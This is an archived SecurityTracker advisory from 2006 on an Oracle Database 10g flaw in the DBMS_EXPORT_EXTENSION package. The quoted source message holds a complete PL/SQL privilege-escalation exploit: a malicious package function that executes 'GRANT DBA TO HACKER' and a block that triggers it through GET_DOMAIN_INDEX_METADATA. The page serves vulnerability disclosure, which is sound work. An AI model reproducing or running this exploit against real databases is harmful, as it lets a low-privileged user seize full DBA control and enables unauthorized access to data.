SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Database)  >   Oracle Database Vendors:   Oracle
Oracle Database DBMS_EXPORT_EXTENSION Package Lets Remote Users Execute Arbitrary Functions
SecurityTracker Alert ID:  1015999
SecurityTracker URL:  http://securitytracker.com/id/1015999
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 26 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 10.2.0.2.0
Description:   A vulnerability was reported in Oracle Database. A remote authenticated user can execute arbitrary functions on the database.

A remote authenticated user can invoke the DBMS_EXPORT_EXTENSION package to open a user-supplied object and have the object execute an arbitrary function.

The vendor was notified on February 19, 2006 by NGSSoftware, which separately discovered this vulnerability.

N1V1Hd $3c41r3 originally disclosed this vulnerability.

Impact:   A remote authenticated user can execute arbitrary functions on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.oracle.com/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (AIX), UNIX (HP/UX), UNIX (Solaris - SunOS), Windows (NT), Windows (2000)

Message History:   None.


 Source Message Contents

Subject:  Oracle 10g 10.2.0.2.0 DBA exploit

/*
* Fucking NON-0 day($) exploit for Oracle 10g 10.2.0.2.0
*
* Patch your database now!
*
* by N1V1Hd $3c41r3
*
*/

CREATE OR REPLACE
PACKAGE MYBADPACKAGE AUTHID CURRENT_USER
IS
  FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3  
VARCHAR2,p4  VARCHAR2,env SYS.odcienv)
   RETURN NUMBER;
END;
/

CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
IS
  FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3  
VARCHAR2,p4  VARCHAR2,env SYS.odcienv)
    RETURN NUMBER
  IS
   pragma autonomous_transaction;
  BEGIN
    EXECUTE IMMEDIATE 'GRANT DBA TO HACKER';
    COMMIT;
    RETURN(1);
  END;

END;
/

DECLARE
  INDEX_NAME VARCHAR2(200);
  INDEX_SCHEMA VARCHAR2(200);
  TYPE_NAME VARCHAR2(200);
  TYPE_SCHEMA VARCHAR2(200);
  VERSION VARCHAR2(200);
  NEWBLOCK PLS_INTEGER;
  GMFLAGS NUMBER;
  v_Return VARCHAR2(200);
BEGIN
  INDEX_NAME := 'A1';  INDEX_SCHEMA := 'HACKER';
  TYPE_NAME := 'MYBADPACKAGE';  TYPE_SCHEMA := 'HACKER';
  VERSION := '10.2.0.2.0';  GMFLAGS := 1;

  v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
    INDEX_NAME => INDEX_NAME,    INDEX_SCHEMA => INDEX_SCHEMA,    TYPE_NAME 
=> TYPE_NAME,
    TYPE_SCHEMA => TYPE_SCHEMA,    VERSION => VERSION,    NEWBLOCK => 
NEWBLOCK,    GMFLAGS => GMFLAGS
	  );
END;
/

_________________________________________________________________
http://join.msn.com?XAPID=1697&DI=1055&HL=Footer_mailsenviados_correosmasdivertidos

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC